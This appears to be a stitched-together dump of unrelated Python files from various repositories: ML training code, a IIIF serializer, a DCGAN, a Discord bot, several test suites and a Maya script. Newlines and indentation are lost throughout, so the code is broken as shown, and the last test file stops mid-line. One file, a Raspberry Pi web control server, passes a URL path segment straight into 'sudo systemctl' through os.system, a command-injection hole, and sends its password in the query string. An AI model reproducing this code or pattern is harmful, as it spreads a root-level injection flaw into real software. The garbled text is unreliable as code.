os.mkdir(cfg.DIRS.WEIGHTS) # Load Data trainloader = build_dataloader(cfg, mode="train") validloader = build_dataloader(cfg, mode="valid") # testloader = build_dataloader(cfg, mode="test") # Define model/loss/optimizer/Scheduler model = build_model(cfg) # model = nn.DataParallel(model) # loss = build_loss_func(cfg) weight=torch.Tensor([0.1, 0.1, 0.1, 1.5]) weight = weight.to("cuda") loss = nn.CrossEntropyLoss(weight=weight) optimizer = build_optim(cfg, model) scheduler = build_scheduler(args, len(trainloader), cfg) # Load model checkpoint model, start_epoch, best_metric = load_checkpoint(args, model) start_epoch = 0 best_metric = 0 if cfg.SYSTEM.GPU: model = model.cuda() # Run Script if mode == "train": for epoch in range(start_epoch, cfg.TRAIN.EPOCHES): print("EPOCH", epoch) train_loss = train_loop( cfg, epoch, model, trainloader, loss, scheduler, optimizer, scaler ) best_metric = valid_model( cfg, mode, epoch, model, validloader, loss, best_metric=best_metric, save_prediction= False, visual=False ) elif mode == "valid": valid_model( cfg, mode, 0, model, validloader, loss, best_metric=best_metric, save_prediction=True, visual=True ) elif mode == "test": test_model(cfg, mode, model, validloader, loss) if __name__ == "__main__": # Set up Variable seed = 10 args = parse_args() cfg = get_cfg_defaults() if args.config != "": cfg.merge_from_file(args.config) # Set seed for reproducible result setup_determinism(seed) main(cfg, args) ecds/readux # pylint: disable = attribute-defined-outside-init, too-few-public-methods """Module for serializing IIIF Annotation""" from django.core.serializers.base import SerializerDoesNotExist from apps.iiif.serializers.base import Serializer as JSONSerializer import config.settings.local as settings class Serializer(JSONSerializer): """ Serialize a :class:`apps.iiif.annotation.models.Annotation` object based on the IIIF Presentation API IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list """ def _init_options(self): super()._init_options() self.owners = self.json_kwargs.pop('owners', 0) def get_dump_object(self, obj): """ Serialize an :class:`apps.iiif.annotation.models.Annotation` based on the IIIF presentation API :param obj: Annotation to be serialized. :type obj: :class:`apps.iiif.annotation.models.Annotation` :return: Serialzed annotation. :rtype: dict """ # TODO: Add more validation checks before trying to serialize. if ((self.version == 'v2') or (self.version is None)): name = 'OCR' if obj.owner_id: name = obj.owner.username if obj.owner.name == '' else obj.owner.name data = { "@context": "http://iiif.io/api/presentation/2/context.json", "@id": str(obj.pk), "@type": "oa:Annotation", "motivation": obj.motivation, "annotatedBy": { "name": name }, "resource": { "@type": obj.resource_type, "format": "text/html", "chars": obj.content, "language": obj.language }, "on": { "full": '{h}/iiif/{v}/{m}/canvas/{c}'.format( h=settings.HOSTNAME, v=self.version, m=obj.canvas.manifest.pid, c=obj.canvas.pid ), "@type": "oa:SpecificResource", "within": { "@id": '{h}/iiif/{v}/{c}/manifest'.format( h=settings.HOSTNAME, v=self.version, c=obj.canvas.manifest.pid ), "@type": "sc:Manifest" }, "selector": { "@type": "oa:FragmentSelector", "value": 'xywh={x},{y},{w},{h}'.format( x=str(obj.x), y=str(obj.y), w=str(obj.w), h=str(obj.h) ) } } } if hasattr(obj, 'style') and obj.style is not None: data['stylesheet'] = self.__serialize_style(obj) if obj.item is not None: data['on']['selector']['item'] = self.__serialize_item(obj) else: data['on']['selector']['item'] = {'@type': 'oa:FragmentSelector'} if hasattr(obj, 'tags') and obj.tags.exists(): data['motivation'] = data['motivation'].split(',') data['resource'] = [data['resource']] for tag in obj.tags.all(): wa_tag = { "@type": "oa:Tag", "chars": tag.name } data['resource'].append(wa_tag) # pylint: disable= no-member return data return None # TODO: write serializer for v3 of the IIIF Presentation API. # elif (self.version == 'v3'): # return None # TODO: is this needed? @classmethod def __serialize_item(cls, obj): return obj.item @classmethod def __serialize_style(cls, obj): """ Private function to serialize the stylesheet data. :param obj: Annotation to be serialized :type obj: :class:`apps.iiif.annotation.models.Annotation` :return: Stylesheet data compliant with the web annotation standard. :rtype: dict """ return { "type": "CssStylesheet", "value": obj.style } class Deserializer: """Deserialize IIIF Annotation :raises SerializerDoesNotExist: Not yet implemented. """ def __init__(self, *args, **kwargs): raise SerializerDoesNotExist("annotation is a serialization-only serializer") 0 from typing import Tuple import numpy as np from sklearn.feature_extraction.text import TfidfVectorizer def tfidf_train(txt: np.ndarray, *, max_features=25_000) -> Tuple[TfidfVectorizer, np.ndarray]: vectorizer = TfidfVectorizer(max_features=max_features) txt_vectors = vectorizer.fit_transform(txt) return vectorizer, txt_vectors py/ctrl/webctrl.py #!/usr/bin/python3 import urllib.parse as urlparse import http.server import socketserver import os import subprocess import configparser import json import psutil import datetime from urllib.parse import parse_qs from os import path from gpiozero import CPUTemperature from datetime import datetime as dt config = configparser.ConfigParser() config.read('/home/pi/pideskboard/configs/config.ini') WEBPATH=config['system']['path']+"ctrl/web" os.chdir(WEBPATH) class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): pathSplit = self.path.split("?") pathSection = pathSplit[0].split("/") if self.path == '/': self.path = '/index.html' print(self.path); return http.server.SimpleHTTPRequestHandler.do_GET(self) elif path.exists(WEBPATH+pathSplit[0]) is True: self.path = pathSplit[0] return http.server.SimpleHTTPRequestHandler.do_GET(self) elif pathSection[1] == "stats.json": self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() outputJson={"ramfree":str(self.get_ramFree())+"MB","ramtotal":str(self.get_ramTotal())+"MB","cpuspeed":str(self.get_cpu_speed())+"MHz","cputemp":str(self.get_temperature())+"°C","cpuuse":str(self.get_cpu_use())+"%","load":str(self.get_load()),"ip":str(self.get_ipaddress()),"uptime":str(self.get_uptime())} return self.wfile.write(bytes(json.dumps(outputJson), "utf-8")) elif pathSection[1] == "run": self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() if self.getPass(self.path) == config['ctrl']['pass']: if pathSection[2] == "reboot": self.wfile.write(bytes('{"html":"Rebooting the Raspberry Pi","cmd":null}', "utf-8")) os.system(config['cli']['reboot']) elif pathSection[2] == "poweroff": self.wfile.write(bytes('{"html":"Powering off the Raspberry Pi","cmd":null}', "utf-8")) os.system(config['cli']['poweroff']) elif pathSection[2] == "restart": self.wfile.write(bytes('{"html":"Restarting the UI","cmd":null}', "utf-8")) os.system(config['cli']['restart']) elif pathSection[2] == "start": self.wfile.write(bytes('{"html":"Starting the UI","cmd":null}', "utf-8")) os.system(config['cli']['start']) elif pathSection[2] == "kill": self.wfile.write(bytes('{"html":"Killing the UI","cmd":null}', "utf-8")) os.system(config['cli']['kill']) elif pathSection[2] == "bluetooth": self.wfile.write(bytes('{"html":"Restarting the Bluetooth","cmd":null}', "utf-8")) os.system(config['cli']['bluetooth']) elif pathSection[2] == "service": if pathSection[3] == "start" and pathSection[4] is not None: self.wfile.write(bytes('{"html":"Starting the ' + pathSection[4] + ' service.","cmd":null}', "utf-8")) os.system("sudo systemctl start " + pathSection[4]) elif pathSection[3] == "stop" and pathSection[4] is not None: self.wfile.write(bytes('{"html":"Stoping the ' + pathSection[4] + ' service.","cmd":null}', "utf-8")) os.system("sudo systemctl stop " + pathSection[4]) elif pathSection[3] == "restart" and pathSection[4] is not None: self.wfile.write(bytes('{"html":"Re-starting the ' + pathSection[4] + ' service.","cmd":null}', "utf-8")) os.system("sudo systemctl restart " + pathSection[4]) else: self.wfile.write(bytes('{"html":"Unknown service command","cmd":null}', "utf-8")) else: self.wfile.write(bytes('{"html":"Wrong command","cmd":null}', "utf-8")) else: self.wfile.write(bytes('{"html":"Wrong password","cmd":null}', "utf-8")) else: self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(bytes('Document requested is not found.', "utf-8")) return def getPass(self,url): parsed = urlparse.urlparse("http://localhost"+url) return str(parse_qs(parsed.query)['pass']).replace("['","").replace("']","") def get_ramTotal(self): memory = psutil.virtual_memory() return round(memory.total/1024.0/1024.0,1) def get_ramFree(self): memory = psutil.virtual_memory() return round(memory.available/1024.0/1024.0,1) def get_cpu_use(self): return psutil.cpu_percent() def get_temperature(self): try: cpu = CPUTemperature() return cpu.temperature except: return "n/a" def get_uptime(self): try: s = subprocess.check_output(["uptime","-p"]) return s.decode().replace("\n","") except: return "n/a" def get_load(self): try: s = subprocess.check_output(["uptime"]) load_split = s.decode().split("load average:") return load_split[1].replace("\n","") except: return "n/a" def get_ipaddress(self): try: s = subprocess.check_output(["hostname","-I"]) return s.decode().replace("\n","") except: return "0.0.0.0" def get_cpu_speed(self): try: f = os.popen('vcgencmd get_config arm_freq') cpu = f.read() if cpu != "": return cpu.split("=")[1].replace("\n","") else: return "n/a" except: return "n/a" print(dt.now().strftime("%m-%d-%y %H:%M > ") + "piWebCtrl started") handler_object = MyHttpRequestHandler my_server = socketserver.TCPServer(("0.0.0.0", int(config['ctrl']['port'])), handler_object) print(dt.now().strftime("%m-%d-%y %H:%M > ") + "piWebCtrl started Web Server") my_server.serve_forever() castargo/SarcDetectionRusModels import gensim.downloader as api import numpy as np from joblib import Parallel, delayed from pymystem3 import Mystem from sklearn.base import BaseEstimator, ClassifierMixin from pathlib import Path import pickle from tqdm import tqdm def tag(word): RNC2UPOS = { 'A': 'ADJ', 'ADV': 'ADV', 'ADVPRO': 'ADV', 'ANUM': 'ADJ', 'APRO': 'DET', 'COM': 'ADJ', 'CONJ': 'SCONJ', 'INTJ': 'INTJ', 'NONLEX': 'X', 'NUM': 'NUM', 'PART': 'PART', 'PR': 'ADP', 'S': 'NOUN', 'SPRO': 'PRON', 'UNKN': 'X', 'V': 'VERB' } m = Mystem() processed = m.analyze(word)[0] lemma = processed["analysis"][0]["lex"].lower().strip() pos = processed["analysis"][0]["gr"].split(',')[0] pos = pos.split('=')[0].strip() tagged = lemma+'_'+RNC2UPOS[pos] return tagged class GensimWord2VecRUSEmbeddingVectorizer(BaseEstimator, ClassifierMixin): def __init__(self, concat_strings=True, tag_path='./data/Embeddings/word2vec_ruscorpora_tags.pickle'): self.model = api.load("word2vec-ruscorpora-300") self.seq_size = 30 self.concat_strings = concat_strings self.vec_size = 300 self.tag_path = tag_path self._load_tag_tokens() def fit(self, X, y=None): return self def get_params(self, **params): return {'model': self.model, 'seq_size': self.seq_size} def _load_tag_tokens(self): if Path(self.tag_path).is_file(): with open(self.tag_path, 'rb') as f: self.tag_tokens = pickle.load(f) else: self.tag_tokens = {} def _get_token(self, origin_token): if origin_token in self.tag_tokens: return self.tag_tokens[origin_token] try: token = tag(origin_token) self.tag_tokens[origin_token] = token except: self.tag_tokens[origin_token] = "" return self.tag_tokens[origin_token] def _get_token_vec(self, origin_token): token = self._get_token(origin_token) if token in self.model: return self.model[token] else: return np.zeros((self.vec_size, )) def _transform_one(self, input_string): tokens = input_string.split() embedd_tokens = [ np.expand_dims(self._get_token_vec(t), 0) for t in tokens[:self.seq_size] ] if len(embedd_tokens) < self.seq_size: embedd_tokens += [np.expand_dims(np.zeros((self.vec_size, )), 0)] * (self.seq_size - len(embedd_tokens)) if self.concat_strings: return np.concatenate(embedd_tokens, 1) else: return np.array([embedd_tokens]) def transform(self, X): vectors = [self._transform_one(s) for s in X] with open(self.tag_path, 'wb') as f: pickle.dump(self.tag_tokens, f) embeddings = np.concatenate(vectors, 0) if self.concat_strings: return embeddings else: return np.squeeze(embeddings, 2) import pickle as pkl import numpy as np with open("all_metrics.pkl", "rb") as f: metrics = pkl.load(f) all_pop = np.array([v[0] for v in metrics]) all_pvi = np.array([v[1] for v in metrics]) all_comp = np.array([v[2] for v in metrics]) pop_mean = np.mean(all_pop) pvi_mean = np.mean(all_pvi) comp_mean = np.mean(all_comp) mean_array = np.array([pop_mean, pvi_mean, comp_mean]) std_array = np.array([np.std(all_pop), np.std(all_pvi), np.std(all_comp)]) with open("new_metrics.pkl", "wb") as fout: pkl.dump((mean_array, std_array), fout) drehak/leapp import pytest from leapp.actors import Actor, get_actors from leapp.topics import Topic from leapp.exceptions import CyclingDependenciesError from leapp.models import Model from leapp.tags import Tag from leapp.workflows.phaseactors import PhaseActors class CycleTag1(Tag): name = 'cycle1' class PhaseActorsModelsTag1(Tag): name = 'phase-actor-models1' class CycleTopic(Topic): name = 'cycle' class CycleModel1(Model): topic = CycleTopic class CycleModel2(Model): topic = CycleTopic class CycleActor1(Actor): name = 'CycleActor1' description = 'Unit Test Actor CycleActor1' consumes = (CycleModel1,) produces = (CycleModel2,) tags = (CycleTag1,) class CycleActor2(Actor): name = 'CycleActor2' description = 'Unit Test Actor CycleActor2' consumes = (CycleModel2,) produces = (CycleModel1,) tags = (CycleTag1, PhaseActorsModelsTag1) class CycleActor3(Actor): name = 'CycleActor3' description = 'Unit Test Actor CycleActor3' consumes = (CycleModel1,) produces = () tags = (CycleTag1, PhaseActorsModelsTag1) def setup_module(module): for actor in get_actors(): for tag in actor.tags: tag.actors = tag.actors + (actor,) def test_actor_phases_detect_cycles(): # Expected a cycle to be detected with pytest.raises(CyclingDependenciesError): PhaseActors(CycleTag1.actors, 'Test') # This should not cause a cycle to be present PhaseActors(PhaseActorsModelsTag1.actors, 'Test') def test_actor_phases_check_models(): phase_actors = PhaseActors(PhaseActorsModelsTag1.actors, 'Test') assert len(phase_actors.initial) == 1 and phase_actors.initial[0] is CycleModel2 assert len(phase_actors.consumes) == 2 assert CycleModel1 in phase_actors.consumes assert CycleModel2 in phase_actors.consumes assert len(phase_actors.produces) == 1 assert CycleModel1 in phase_actors.produces def test_actor_phases_order(): initial_actors = (CycleActor3, CycleActor2) phase_actors = PhaseActors(initial_actors, 'Test') assert len(phase_actors.actors) == 2 assert phase_actors.actors[0] is CycleActor2 assert phase_actors.actors[1] is CycleActor3 1-10 import tensorflow as tf from tensorflow import keras from tensorflow.keras.layers import * def deconv(out_channels, kernel_size, stride=2, padding=1, batch_norm=True): """Create a transposed-convolutional layer with optional batch normalization """ # create a sequence of transpose + optional batch norm layers ## We don't need that in_channel in tensorflow layers = [] transpose_conv_layer = Conv2DTranspose(out_channels, kernel_size, strides = stride, padding = 'same', use_bias = False, data_format = "channels_first") # append transpose convolutional layer layers.append(transpose_conv_layer) if batch_norm: # append batchnorm layer layers.append(BatchNormalization()) ## rtype: List[t_conv_layer, batch_norm] or List[t_conv_Layer] return layers class Generator(keras.Model): ## outputsize = stride * (inputsize - 1) + 2 * padding - kernelsize + 2. if padding == 1 than outputsize == inputsize. So we use padding = 'same' in tf def __init__(self, z_size, conv_dim = 32): ## inherit init method from class Model in keras, if you have no idea with what inherit methods from ## parent model, please Google "super python" super(Generator, self).__init__() # complete init function self.conv_dim = conv_dim self.fc = Dense(conv_dim * 4 * 4 * 4, input_shape = (z_size,)) t_conv1 = deconv(conv_dim * 2, 4) self.t_conv1 = t_conv1[0] if len(t_conv1) == 2: self.bn_1 = t_conv1[1] t_conv2 = deconv(conv_dim, 4) self.t_conv2 = t_conv2[0] if len(t_conv2) == 2: self.bn_2 = t_conv2[1] # desired depth for RGB image is 3 ## output here is in CHW format self.t_conv3 = deconv(3, 4, batch_norm = False)[0] def call(self, xx, training = None): # call in tf is an equivalent with forward in torch out = self.fc(xx) out = tf.reshape(out, [-1, self.conv_dim * 4, 4, 4]) out = self.t_conv1(out) if self.bn_1: out = self.bn_1(out, training = training) out = tf.nn.relu(out) out = self.t_conv2(out) if self.bn_2: out = self.bn_2(out, training = training) out = tf.nn.relu(out) out = self.t_conv3(out) out = tf.tanh(out) ## to HWC format ## Time complexity of numpy.transpose is O(1), according to: https://www.thetopsites.net/article/58279082.shtml # out = tf.transpose(out, perm = [0, 3, 1, 2]) return out def conv(out_channels, kernel_size, stride=2, padding=1, batch_norm=True): """Creates a convolutional layer, with optional batch normalization. """ layers = [] conv_layer = Conv2D(out_channels, kernel_size, strides = stride, padding = 'same', use_bias = False, data_format = "channels_first") # bias is set to False, so the layers are not offset by any amount # append conv layer layers.append(conv_layer) if batch_norm: # append batchnorm layer layers.append(BatchNormalization()) ## rtype: List[conv_layer, batch_norm] or List[conv_layer] return layers class Discriminator(keras.Model): ## outputsize = (inputsize - kernelsize + 2 * padding)/stride + 1, so when stride = 2, kernel_size = 4. if padding == 1 than outputsize == inputsize. So we use padding = 'same' in tf ## if you want to custom padding size, please read helper here https://stackoverflow.com/questions/37659538/custom-padding-for-convolutions-in-tensorflow ## tf.pad is still available in tf 2.0+ ## you can also create a sequence and use sequence.add(layer) to add layers to model, see the tutorial here: ## https://www.tensorflow.org/tutorials/generative/dcgan def __init__(self, conv_dim=32): super(Discriminator, self).__init__() self.conv_dim = conv_dim self.conv1 = conv(conv_dim, 4, batch_norm= False)[0] conv2 = conv(conv_dim * 2, 4) self.conv2 = conv2[0] if len(conv2) == 2: self.bn_1 = conv2[1] conv3 = conv(conv_dim * 4, 4) self.conv3 = conv3[0] if len(conv3) == 2: self.bn_2 = conv3[1] self.flatten = Flatten() self.fc = Dense(1) def call(self, xx, training = None): out = self.conv1(xx) out = tf.nn.leaky_relu(out, alpha = 0.2) out = self.conv2(out) if self.bn_1: out = self.bn_1(out, training = training) out = tf.nn.leaky_relu(out, alpha = 0.2) out = self.conv3(out) if self.bn_2: out = self.bn_2(out, training = training) out = tf.nn.leaky_relu(out, alpha = 0.2) out = self.flatten(out) out = self.fc(out) return out def real_loss(D_out, smooth=False): batch_size = D_out.shape[0] # label smoothing if smooth: # smooth, real labels = 0.9 labels = tf.ones(batch_size) * 0.9 else: labels = tf.ones(batch_size) # real labels = 1 ## Reference 1: https://stackoverflow.com/questions/55683729/bcewithlogitsloss-in-keras ## Reference 2: https://www.tensorflow.org/tutorials/generative/dcgan ## So we use BinaryCrossentropy here in tf to replace BCEWithLogitsLoss() in torch criterion = tf.keras.losses.BinaryCrossentropy(from_logits=True) loss = criterion(labels, D_out) return loss def fake_loss(D_out): batch_size = D_out.shape[0] labels = tf.zeros(batch_size) # fake labels = 0 criterion = tf.keras.losses.BinaryCrossentropy(from_logits=True) # calculate loss loss = criterion(labels, D_out) return loss ## I put in the loss calculation here instead of main function def dis_loss(generator, discriminator, input_noise, real_image, is_training): fake_image = generator(input_noise, is_training) d_real_logits = discriminator(real_image, is_training) d_fake_logits = discriminator(fake_image, is_training) d_loss_real = real_loss(d_real_logits) d_loss_fake = fake_loss(d_fake_logits) loss = d_loss_real + d_loss_fake return loss def gen_loss(generator, discriminator, input_noise, is_training): fake_image = generator(input_noise, is_training) fake_loss = discriminator(fake_image, is_training) loss = real_loss(fake_loss) return lossfightlol/Cloud-Nine import os import io import ksoftapi from googletrans import Translator, LANGUAGES from textwrap import TextWrapper import random import discord from discord.ext import commands class Utility(commands.Cog): def __init__(self, bot): self.bot = bot self.trans = Translator() @commands.command() async def listusers(self, ctx): """Displays the list of connected users""" if not ctx.author.voice: return await ctx.send("You are not connected to a voice channel :mute:") members = ctx.author.voice.channel.members memnames = [] for member in members: memnames.append(member.name) embed = discord.Embed(title = f"Members in *{ctx.author.voice.channel.name}*", color = ctx.author.color) embed.add_field(name= "List of users", value= f"**\n" + "\n".join(memnames) + "**") embed.set_footer(icon_url=ctx.author.avatar_url, text=f"Requested by {ctx.author.name}") await ctx.send(embed = embed) @commands.command(no_pm=True) async def whosplaying(self, ctx, *, game): """Shows who's playing a specific game""" if len(game) <= 1: await ctx.send("```The game should be at least 2 characters long...```", delete_after=5.0) return guild = ctx.message.guild members = guild.members playing_game = "" count_playing = 0 for member in members: if not member: continue if not member.activity or not member.activity.name: continue if member.bot: continue if game.lower() in member.activity.name.lower(): count_playing += 1 if count_playing <= 15: emote = random.choice([":trident:", ":high_brightness:", ":low_brightness:", ":beginner:", ":diamond_shape_with_a_dot_inside:"]) playing_game += f"{emote} {member.name} ({member.activity.name})\n" if playing_game == "": await ctx.send("Search results:\nNo users are currently playing that game.") else: msg = playing_game if count_playing > 15: showing = "(Showing 15/{})".format(count_playing) else: showing = "({})".format(count_playing) em = discord.Embed(description=msg, colour=discord.Colour(value=0x36393e)) em.set_author(name=f"""Who's playing "{game}"? {showing}""") await ctx.send(embed=em) def setup(bot): bot.add_cog(Utility(bot))""" inventory integration tests """ import json import os import pytest from ... import defaults from .._common import get_executable_path from .._common import fixture_path_from_request from .._common import update_fixtures CLI = ( f"{get_executable_path('python')}" " -m ansible_navigator inventory" f" -i {os.path.join(defaults.FIXTURES_DIR,'inventory')}" ) testdata = [ (0, CLI, "ansible-navigator inventory command top window"), (1, ":0", "Browse hosts/ungrouped window"), (2, ":0", "Group list window"), (3, ":0", "group01 hosts detail window"), (4, ":0", "host0101 detail window"), (5, ":back", "Previous window (group01 hosts detail window)"), (6, ":back", "Previous window (Group list window)"), (7, ":1", "group02 hosts detail window"), (8, ":0", "host0201 detail window"), (9, ":back", "Previous window (group02 hosts detail window)"), (10, ":back", "Previous window (Group list window)"), (11, ":2", "group03 hosts detail window"), (12, ":0", "host0301 detail window"), (13, ":back", "Previous window (group03 hosts detail window)"), (14, ":back", "Previous window (Group list window)"), (15, ":back", "Previous window (Browse hosts/ungrouped window)"), (16, ":back", "Previous window (top window)"), (17, ":1", "Inventory hostname window"), (18, ":0", "host0101 detail window"), (19, ":back", "Previous window after host0101 (Inventory hostname window)"), (20, ":1", "host0201 detail window"), (21, ":back", "Previous window after host0201 (Inventory hostname window)"), (22, ":2", "host0301 detail window"), ] def test_testdata_indicies(): """sanity check on the data because I forgot how to count""" expected = list(range(0, len(testdata))) actual = [x[0] for x in testdata] assert expected == actual @pytest.mark.parametrize("index, user_input, comment", testdata) def test_inventory_interactive_inventory_list(request, tmux_session, index, user_input, comment): # pylint:disable=unused-argument """test interactive inventory uncomment the update_fixtures line to update the fixtures """ received_output = tmux_session.interaction(user_input) # update_fixtures(request, index, received_output, comment) # FIXME: keep commented out dir_path, file_name = fixture_path_from_request(request, index) with open(f"{dir_path}/{file_name}") as infile: expected_output = json.load(infile)["output"] assert expected_output == received_output fera = {'animal':'pitbull', 'dono':'Flavio José'} bocudo = {'animal':'papagaio','dono':'Priscila Alcantara'} mimi = {'animal': 'gata','dono':'Fabrine Cardoso'} sara = {'animal': 'pastor alemao','dono' : ''} pets = [fera,bocudo,mimi,sara] for pet in pets: print('\nPets: ' , pet) # coding:utf-8 # --author-- binglu.wang from __future__ import print_function import os import logging import maya.cmds as cmds import zfused_api import zfused_maya.core.record as record import zfused_maya.core.filefunc as filefunc import zfused_maya.node.core.alembiccache as alembiccache import zfused_maya.node.core.texture as texture import zfused_maya.node.core.yeti as yeti import zfused_maya.node.core.material as material import zfused_maya.node.core.fixmeshname as fixmeshname import zfused_maya.node.core.renderinggroup as renderinggroup import zfused_maya.node.core.referencefile as referencefile __all__ = ["publish_file"] logger = logging.getLogger(__name__) # test def publish_file(): """ 上传yeti文件 """ _attr_code = "file" _file_suffix = "mb" _file_format = "mayaBinary" _current_file = cmds.file(q = True, sn = True) # get current task id _task_id = record.current_task_id() if not _task_id: logger.error("no active task") return False # get backup file path _task_handle = zfused_api.task.Task(_task_id) _object_handle = zfused_api.objects.Objects(_task_handle.data["Object"], _task_handle.data["LinkId"]) _production_path = _task_handle.production_path() _file_code = _object_handle.file_code() _file_index = _task_handle.last_version_index() + 1 _production_file = "%s/%s/%s.%04d.%s"%(_production_path, _attr_code, _file_code, _file_index, _file_suffix) _cover_file = "%s/%s/%s.%s"%(_production_path, _attr_code, _file_code, _file_suffix) # get publish file path _publish_path = _task_handle.publish_path() _publish_file = "%s/%s/%s.%04d.%s"%(_publish_path, _attr_code, _file_code, _file_index, _file_suffix) _publish_file_dir = os.path.dirname(_publish_file) if not os.path.isdir(_publish_file_dir): os.makedirs(_publish_file_dir) try: _current_file = cmds.file(q = 1,sn = 1) # save publish file _sel = [i for i in cmds.ls("fx") if cmds.objExists("%s.name"%i) and cmds.getAttr("%s.name"%i) == "fx"] _yeti_all_set = cmds.ls("yeti_all_sets",type = "objectSet") if _yeti_all_set: _sel.append(_yeti_all_set[0]) cmds.select(_sel,r = 1,ne = 1) cmds.file(rename = _publish_file) cmds.file(f = 1,options = "v=0;",typ = "mayaBinary" ,pr= 1, es=1) # open publish file cmds.file(new = 1,f= 1) cmds.file(_publish_file,f =1,o = 1,typ = "mayaBinary",ignoreVersion = 1,options = "v=0;") # publish texture # 修改文件中贴图路径 _texture_files = texture.files() if _texture_files: # 获取路径 _path_set = texture.paths(_texture_files)[0] _intersection_path = max(_path_set) texture.publish_file(_texture_files, _intersection_path, _production_path + "/texture") # change maya texture node path _file_nodes = texture.nodes() if _file_nodes: texture.change_node_path(_file_nodes, _intersection_path, _production_path + "/texture") # 修改文件中yeti节点里的贴图路径 _yeti_texture_dict = yeti._get_yeti_attr("texture","file_name") if _yeti_texture_dict: _path_set = yeti.paths([i.replace("\\","/") for i in _yeti_texture_dict.values()])[0] _intersection_path = max(_path_set) yeti.publish_file(_yeti_texture_dict.values(), _intersection_path, _production_path + "/texture") yeti.change_node_path(_yeti_texture_dict,_intersection_path, _production_path + "/texture") # delete unused material material.delete_unused() # recore material material.record() # save publish file cmds.file(save = True, type = _file_format, f = True) # publish file _result = filefunc.publish_file(_publish_file, _production_file) _result = filefunc.publish_file(_publish_file, _cover_file) # link files zfused_api.files.new_file("task", _task_id, _production_file, _file_index) zfused_api.files.new_file("task", _task_id, _cover_file, _file_index) except Exception as e: logger.error(e) return False # open orignal file # if _current_file: # cmds.file(_current_file, o = True, f = True, pmt = True) return True if __name__ == '__main__': publish_file()# This file is part of the CERN Indico plugins. # Copyright (C) 2014 - 2022 CERN # # The CERN Indico plugins are free software; you can redistribute # them and/or modify them under the terms of the MIT License; see # the LICENSE file for more details. from datetime import date, datetime import pytest from indico.core.db.sqlalchemy.protection import ProtectionMode from indico.modules.rb.models.reservations import Reservation from indico.modules.rb.models.room_attributes import RoomAttribute from indico.modules.rb.models.rooms import RoomAttributeAssociation from indico.web.flask.util import url_for from indico_burotel.tasks import auto_cancel_bookings pytest_plugins = 'indico.modules.rb.testing.fixtures' pytestmark = [pytest.mark.usefixtures('smtp')] class NoCSRFTestClient: def __init__(self, client): self.client = client def __getattr__(self, attr): def _verb_wrapper(*args, **kwargs): headers = kwargs.get('headers', {}) headers['X-CSRF-Token'] = 'dummy' kwargs['headers'] = headers return getattr(self.client, attr)(*args, **kwargs) if attr in {'post', 'patch', 'delete'}: return _verb_wrapper else: return getattr(self.client, attr) @pytest.fixture(autouse=True) def room_attributes(db): attr_approval = RoomAttribute(name='confirmation-by-secretariat', title="Secretariat must confirm") attr_lock = RoomAttribute(name='electronic-lock', title="Electronic Lock") db.session.add(attr_approval) db.session.add(attr_lock) db.session.flush() return (attr_lock, attr_approval) @pytest.fixture(autouse=True) def back_to_the_past(freeze_time): freeze_time(datetime(2020, 1, 1)) @pytest.fixture def no_csrf_client(test_client, monkeypatch): monkeypatch.setattr('indico.web.flask.session.IndicoSession.csrf_token', property(lambda self: 'dummy')) return NoCSRFTestClient(test_client) def test_update_called_on_create(db, dummy_user, mocker, create_room, no_csrf_client, room_attributes): attr_lock = room_attributes[0] adams_request = mocker.patch('indico_burotel.tasks._adams_request') room = create_room() with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) assert no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-01", 'end_dt': "2020-02-02", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id }).status_code == 200 assert not adams_request.called # ADaMS is only contacted for rooms with 'electronic-lock' set to 'yes' room.attributes.append(RoomAttributeAssociation(attribute=attr_lock, value='yes')) db.session.flush() assert no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-03", 'end_dt': "2020-02-04", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id }).status_code == 200 adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 3), date(2020, 2, 4)) def test_update_called_on_accept(create_room, mocker, no_csrf_client, dummy_user, room_attributes): attr_lock = room_attributes[0] adams_request = mocker.patch('indico_burotel.tasks._adams_request') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True) room.attributes.append(RoomAttributeAssociation(attribute=attr_lock, value='yes')) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-02-01", 'end_dt': "2020-02-02", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 prebooking = Reservation.get(response.json['booking']['id']) assert not adams_request.called no_csrf_client.post(url_for('rb.booking_state_actions', booking_id=prebooking.id, action='approve')) # after the pre-booking is accepted, _adams_request should be called adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 1), date(2020, 2, 2)) def test_update_called_on_modify(create_room, mocker, no_csrf_client, dummy_user, room_attributes): attr_lock = room_attributes[0] adams_request = mocker.patch('indico_burotel.tasks._adams_request') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True) room.attributes.append(RoomAttributeAssociation(attribute=attr_lock, value='yes')) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': '2020-02-01', 'end_dt': '2020-02-02', 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id }) assert response.status_code == 200 adams_request.assert_called_once_with('create', dummy_user, room, date(2020, 2, 1), date(2020, 2, 2)) adams_request.reset_mock() response = no_csrf_client.patch(url_for('rb.update_booking', booking_id=response.json['booking']['id']), data={ 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'start_dt': '2020-02-02', 'end_dt': '2020-02-03' }) assert response.status_code == 200 assert adams_request.call_args_list == [ (('cancel', 